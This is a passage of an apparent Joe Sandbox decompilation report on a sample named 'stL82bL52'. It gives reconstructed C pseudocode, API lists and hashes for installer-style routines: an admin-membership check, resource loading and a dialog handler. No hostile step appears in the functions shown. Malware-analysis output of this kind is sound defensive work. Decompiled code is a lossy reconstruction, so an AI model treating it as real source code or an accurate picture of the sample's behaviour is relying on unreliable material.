                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0x1f8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E001F6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E001F17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0x1f8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x001f18a3
                                                                                                                                                                                                        0x001f18a3
                                                                                                                                                                                                        0x001f18ab
                                                                                                                                                                                                        0x001f18b2
                                                                                                                                                                                                        0x001f18b5
                                                                                                                                                                                                        0x001f18be
                                                                                                                                                                                                        0x001f18c0
                                                                                                                                                                                                        0x001f18c6
                                                                                                                                                                                                        0x001f18c7
                                                                                                                                                                                                        0x001f18ca
                                                                                                                                                                                                        0x001f18cf
                                                                                                                                                                                                        0x001f19c9
                                                                                                                                                                                                        0x001f19d8
                                                                                                                                                                                                        0x001f19d8
                                                                                                                                                                                                        0x001f18df
                                                                                                                                                                                                        0x001f19b8
                                                                                                                                                                                                        0x001f19bd
                                                                                                                                                                                                        0x001f19bf
                                                                                                                                                                                                        0x001f19bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f19bd
                                                                                                                                                                                                        0x001f18fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1912
                                                                                                                                                                                                        0x001f19aa
                                                                                                                                                                                                        0x001f19ad
                                                                                                                                                                                                        0x001f19b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1927
                                                                                                                                                                                                        0x001f1927
                                                                                                                                                                                                        0x001f1932
                                                                                                                                                                                                        0x001f1936
                                                                                                                                                                                                        0x001f19a9
                                                                                                                                                                                                        0x001f19a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f19a9
                                                                                                                                                                                                        0x001f194c
                                                                                                                                                                                                        0x001f19a2
                                                                                                                                                                                                        0x001f19a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f196e
                                                                                                                                                                                                        0x001f1970
                                                                                                                                                                                                        0x001f1999
                                                                                                                                                                                                        0x001f199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f199c
                                                                                                                                                                                                        0x001f1972
                                                                                                                                                                                                        0x001f1972
                                                                                                                                                                                                        0x001f1975
                                                                                                                                                                                                        0x001f1984
                                                                                                                                                                                                        0x001f1985
                                                                                                                                                                                                        0x001f198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f198c
                                                                                                                                                                                                        0x001f1991
                                                                                                                                                                                                        0x001f1996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1996
                                                                                                                                                                                                        0x001f194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001F18DD), ref: 001F181A
                                                                                                                                                                                                          • Part of subcall function 001F17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001F182C
                                                                                                                                                                                                          • Part of subcall function 001F17EE: AllocateAndInitializeSid.ADVAPI32(001F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001F18DD), ref: 001F1855
                                                                                                                                                                                                          • Part of subcall function 001F17EE: FreeSid.ADVAPI32(?,?,?,?,001F18DD), ref: 001F1883
                                                                                                                                                                                                          • Part of subcall function 001F17EE: FreeLibrary.KERNEL32(00000000,?,?,?,001F18DD), ref: 001F188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001F18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001F18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 001F190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 001F1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 001F192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 001F1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 001F197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 001F199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: d47962ec6ef85db971f439f1a6cfe2c6471cc8b94da5c3c11ed02cac85335f7f
                                                                                                                                                                                                        • Instruction ID: 87515ea5592ec3c8164182d21f2a5b8430ab19b7f4d40bac69f937594ac1bbf6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d47962ec6ef85db971f439f1a6cfe2c6471cc8b94da5c3c11ed02cac85335f7f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B3119B1A0020AFFDB209FA5EC58ABFBBB8FF04704B504429F649D2150DB749945DBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x001f4699
                                                                                                                                                                                                        0x001f469b
                                                                                                                                                                                                        0x001f46a9
                                                                                                                                                                                                        0x001f46af
                                                                                                                                                                                                        0x001f46b4
                                                                                                                                                                                                        0x001f46bc
                                                                                                                                                                                                        0x001f46f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f46f9
                                                                                                                                                                                                        0x001f46d9
                                                                                                                                                                                                        0x001f46dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f46e5
                                                                                                                                                                                                        0x001f46ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f46f5
                                                                                                                                                                                                        0x001f46ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 12e3ddcdbbfe9df2d3f1d8dce7839f1254ff035fdf7d966db77631bc2a30f372
                                                                                                                                                                                                        • Instruction ID: 0a2a89f3df313eb8a12fc842b2505a28683719d4cb3c6e0910e339eba8d774f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e3ddcdbbfe9df2d3f1d8dce7839f1254ff035fdf7d966db77631bc2a30f372
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D0181B62442147BE3201BA56C4DF7B7E2CDFCAB72F850014FB4DD6190DEA59882C6A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E001F17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0x1fa288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x001f17f6
                                                                                                                                                                                                        0x001f17fd
                                                                                                                                                                                                        0x001f1805
                                                                                                                                                                                                        0x001f180b
                                                                                                                                                                                                        0x001f180d
                                                                                                                                                                                                        0x001f1815
                                                                                                                                                                                                        0x001f1818
                                                                                                                                                                                                        0x001f1820
                                                                                                                                                                                                        0x001f1824
                                                                                                                                                                                                        0x001f182c
                                                                                                                                                                                                        0x001f1832
                                                                                                                                                                                                        0x001f1837
                                                                                                                                                                                                        0x001f1851
                                                                                                                                                                                                        0x001f1854
                                                                                                                                                                                                        0x001f185d
                                                                                                                                                                                                        0x001f1862
                                                                                                                                                                                                        0x001f186c
                                                                                                                                                                                                        0x001f1872
                                                                                                                                                                                                        0x001f1877
                                                                                                                                                                                                        0x001f187e
                                                                                                                                                                                                        0x001f187e
                                                                                                                                                                                                        0x001f1883
                                                                                                                                                                                                        0x001f1883
                                                                                                                                                                                                        0x001f185d
                                                                                                                                                                                                        0x001f188a
                                                                                                                                                                                                        0x001f188a
                                                                                                                                                                                                        0x001f18a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001F18DD), ref: 001F181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001F182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(001F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001F18DD), ref: 001F1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,001F18DD), ref: 001F1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,001F18DD), ref: 001F188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: c7c0c9be2ca68e1153bb09e018ef6a2ad5efc84d1e5e86cc7fb74777fae9ddff
                                                                                                                                                                                                        • Instruction ID: 9a57f4f662bbe1fe721452dd02e361fa8ae708c879994336f4a0970ddc253938
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7c0c9be2ca68e1153bb09e018ef6a2ad5efc84d1e5e86cc7fb74777fae9ddff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE116371E00209FBDB109FA4EC49ABEBBB8EF48751F500169FA06E2290DF759D45CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E001F43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0x1f9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x1f91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x001f3459
                                                                                                                                                                                                        0x001f345c
                                                                                                                                                                                                        0x001f34d8
                                                                                                                                                                                                        0x001f34de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f34e0
                                                                                                                                                                                                        0x001f345e
                                                                                                                                                                                                        0x001f3463
                                                                                                                                                                                                        0x001f349a
                                                                                                                                                                                                        0x001f34a0
                                                                                                                                                                                                        0x001f34a7
                                                                                                                                                                                                        0x001f34b2
                                                                                                                                                                                                        0x001f34c4
                                                                                                                                                                                                        0x001f34cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f34cb
                                                                                                                                                                                                        0x001f3468
                                                                                                                                                                                                        0x001f346e
                                                                                                                                                                                                        0x001f3474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f347c
                                                                                                                                                                                                        0x001f348c
                                                                                                                                                                                                        0x001f3490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3496
                                                                                                                                                                                                        0x001f3484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 001F34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 001F34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 001F34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: e40744d72af8542e1844bc19e4d8842eac0ae2b880bbc5c7be23b53388a912c9
                                                                                                                                                                                                        • Instruction ID: 10fe7e6976e10ecc6ba522591c82d1fb1ecc81670b6c34f2565d4639f6bc0214
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40744d72af8542e1844bc19e4d8842eac0ae2b880bbc5c7be23b53388a912c9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F01B17124811CABC71A6F64DC1C97E3A64FF45710F414020FB6A86AA0CB349F92DB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0x1f9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F1680(_t65, E001F17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E001F65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
